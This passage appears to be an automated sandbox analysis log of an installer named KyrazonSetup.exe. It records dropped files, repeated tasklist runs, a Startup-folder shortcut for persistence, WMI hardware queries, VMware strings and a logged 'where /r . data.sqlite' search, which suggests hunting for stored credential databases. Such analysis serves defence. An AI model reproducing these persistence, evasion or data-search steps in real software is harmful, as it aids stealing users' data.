Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2714d126-6dff-4bf4-9f31-b75695222b09.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\KyrazonGodot\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeAPI coverage: 8.5 %
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Windows\SysWOW64\find.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\find.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405768
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004062A3 FindFirstFileA,FindClose,0_2_004062A3
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\libJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modulesJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpackedJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcutsJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\localesJump to behavior
Source: KyrazonSetup.exe, 00000000.00000003.1808616840.0000000004FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tgab
Source: KyrazonSetup.exe, 00000000.00000002.1921293457.0000000002B16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8
Source: KyrazonSetup.exe, 00000000.00000002.1921293457.0000000002ADB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a
Source: KyrazonSetup.exe, 00000000.00000003.1808616840.0000000004FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Screen Codec / VMware Video
Source: C:\Users\user\Desktop\KyrazonSetup.exeAPI call chain: ExitProcess graph end nodegraph_0-3180
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeAPI call chain: ExitProcess graph end nodegraph_12-3626
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeCode function: 12_2_00406DDD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00406DDD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "KyrazonGodot.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
